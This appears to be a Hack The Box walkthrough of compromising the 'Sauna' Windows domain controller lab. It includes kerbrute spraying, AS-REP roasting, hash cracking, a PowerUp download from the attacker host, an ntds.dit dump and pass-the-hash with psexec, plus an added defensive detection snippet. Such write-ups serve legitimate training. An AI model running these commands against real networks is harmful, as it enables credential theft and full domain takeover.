
Summary:

Sauna was released on February 15, 2020 and is classified as an “Easy” difficulty Windows vulnerable machine on Hack the Box. In this walk-through, we will discuss the steps taken to compromise Sauna.


Information Gathering:

The first step taken was to run a scan against the vulnerable machine to identify all of the open ports and services present.

AutoRecon, an automated reconnaissance script, was utilized for this task. To learn more about the commands AutoRecon runs under the hood, such as the nmap command below, please visit the link in the references section.

nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.175


Based on the ports that were open, it was safe to assume that this machine was likely a Windows Domain Controller running Active Directory.

The next step taken was to run a gobuster scan to identify any interesting hidden web directories being hosted. Any paths that returned a ‘403’ status code were omitted from the output.

GoBuster Mini-Script

# Legacy gobuster prints "mode (dir)" in its help text and takes no sub-command;
# newer releases use the "gobuster dir" sub-command instead.
if [[ $(gobuster -h 2>&1 | grep -F "mode (dir)") ]]; then
  gobuster -u http://10.10.10.175:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp" -o "tcp_80_http_gobuster.txt"
else
  gobuster dir -u http://10.10.10.175:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" -o "tcp_80_http_gobuster.txt"
fi


Manually reviewing the page sources for some of the paths found above did not reveal any vulnerable software versions. However, the ‘about.html’ page proved useful, as it listed a number of bank employees.

Open Firefox > Go to 10.10.10.175/about.html > Scroll to the bottom of the page


Although employee names were listed on this page, corporate usernames rarely take the form of a plain first name followed by a last name. Several likely username formats for each employee were therefore placed into a text file for later validation by brute force.


Additionally, some useful information on the domain was gathered from the LDAP port, 389. This was good background information to keep in mind moving forward.


Vulnerability Assessment:

Knowing that this is a Windows Domain Controller, several avenues of attack were possible. One interesting piece of gathered information came from running an nmap scan against the Kerberos service.

Although attempting to enumerate users via Kerberos did not fully work, it confirmed that the local domain was indeed ‘EGOTISTICAL-BANK.LOCAL’ and that there was an administrator account present within the domain.

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='egotistical-bank.local' 10.10.10.175


Using the kerbrute tool, 2 of the usernames from the ‘potential-users.txt’ file created earlier were confirmed as valid.

kerbrute_linux_amd64 userenum potential-users.txt -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 -v


Utilizing the password spray function to guess a password was not successful. However, the output showed that the user ‘fsmith’ did not require Kerberos pre-authentication and was therefore vulnerable to ‘AS-REP Roasting’. More information on this attack technique can be found in the links posted within the references section.

kerbrute_linux_amd64 passwordspray potential-users.txt Password123 -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 -v


The GetNPUsers.py script from impacket was then utilized alongside the validated ‘fsmith’ username in an attempt to obtain the krb5 AS-REP hash.

Per the script’s description, it will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). For users with that configuration, a John The Ripper compatible output is generated so that it can be sent for cracking. This is better known as ‘AS-REP Roasting’.

This worked precisely because Kerberos pre-authentication was not required for the account.

~/Desktop/Tools/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile potential-users.txt -format john -outputfile npusers-sauna -dc-ip 10.10.10.175
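A defender-side counterpart to this step, added here and not part of the original write-up: the same UF_DONT_REQUIRE_PREAUTH bit that GetNPUsers.py relies on can be audited from the userAccountControl attribute in LDAP, and the request it sends leaves a 4768 (TGT requested) event with pre-authentication type 0 in the domain controller's Security log. The account names, addresses and event values below are constructed.

```python
# Added defensive example, not part of the original write-up: audit constructed
# LDAP user records for UF_DONT_REQUIRE_PREAUTH and flag the matching 4768 events.

# userAccountControl bits from the AD schema.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000

# LDAP filter a defender would run against the DC to find the same accounts
# (1.2.840.113556.1.4.803 is the bitwise-AND matching rule).
ROASTABLE_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)

# Constructed records shaped like the attributes an LDAP query returns.
SAMPLE_USERS = [
    {"sAMAccountName": "fsmith", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "hsmith", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "oldsvc", "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
]

def roastable_accounts(users, include_disabled=False):
    """Return sAMAccountNames whose UAC has DONT_REQUIRE_PREAUTH set. Disabled
    accounts are skipped (the KDC refuses them) unless asked for as clean-up items."""
    found = []
    for u in users:
        uac = int(u["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(u["sAMAccountName"])
    return found

# Constructed Security-log 4768 events. PreAuthType "0" means the KDC issued the
# AS-REP without pre-authentication, which is what GetNPUsers.py collects; 0x17 is RC4-HMAC.
SAMPLE_4768 = [
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "hsmith", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20"},
    {"EventID": 4769, "TargetUserName": "fsmith", "PreAuthType": "-", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20"},
]

def asrep_roast_alerts(events):
    """Return (user, source ip, etype) for every 4768 answered without pre-authentication."""
    return [
        (e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
        for e in events
        if e.get("EventID") == 4768 and e.get("PreAuthType") == "0"
    ]
```

Any account returned by roastable_accounts should have the flag cleared (or a long random password if an application genuinely needs it), and a 4768 with pre-authentication type 0 from an unexpected source address is the event to alert on.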


Once this hash was obtained, John the Ripper was utilized to crack it and obtain the password.

sudo john --rules --wordlist=/usr/share/wordlists/rockyou.txt npusers-sauna


The clear-text password for user ‘fsmith’ was ‘Thestrokes23’.

Exploitation:

Going back to the nmap scan data, it was apparent that the WinRM port (5985) was open. Connecting to it with the credentials obtained above worked.

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23


Privilege Escalation:

‘PowerUp.ps1’, a PowerShell script that enumerates common Windows privilege escalation vectors, was utilized in this instance. More information on the script can be found in the references section.

The below command was utilized to set up a simple HTTP server on the Kali attacking host.

sudo python -m SimpleHTTPServer 80

Then, the below PowerShell command was utilized to pull the script from Kali to the Windows machine.

powershell Invoke-WebRequest "http://<Kali_IP>/PowerUp.ps1" -OutFile PowerUp.ps1

Once the script was on the machine, the following commands were utilized to a) bypass the default execution policy, b) import the script as a module so that it could be run more easily, and c) run all of the checks the script offers.

Some of the checks include hijackable DLL locations, stored credentials, and unquoted service paths.

powershell.exe -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt


Based on the output of the script, it appeared that a service account named ‘svc_loanmgr’ had clear-text AutoLogon credentials stored in the registry. Service accounts typically have elevated privileges and can be used to escalate privileges or run commands in a privileged context. In this instance, the service account was used with secretsdump.py to dump the contents of the ntds.dit database, which holds the password hashes of every account on the domain controller.

secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175 -outputfile secrets


From here, the passwords could have been cracked offline using John or Hashcat, or the hashes could have been passed back to the machine to authenticate as a higher-privileged user, in this case the local administrator account. The latter method was utilized.

psexec.py EGOTISTICAL-BANK.LOCAL/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff


Conclusion:

Although I utilized the forums quite a bit for the initial exploitation vector, I was able to learn a bit about Kerberos pre-authentication and AS-REP roasting. Although this was my first Windows box and Sauna was classified as “Easy”, it took me a bit longer than I expected. I would still recommend it to anyone new to Hack the Box and to hacking Windows machines, as well as to those interested in learning more about Kerberos.

References:

AutoRecon:

https://github.com/Tib3rius/AutoRecon

Kerbrute:

https://github.com/ropnop/kerbrute

Kerberos Pre-Authentication and AS-REP Roasting:

https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx

https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/

GetNPUsers:

https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_21/examples/GetNPUsers.py

PowerUp:

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

PSExec:

https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py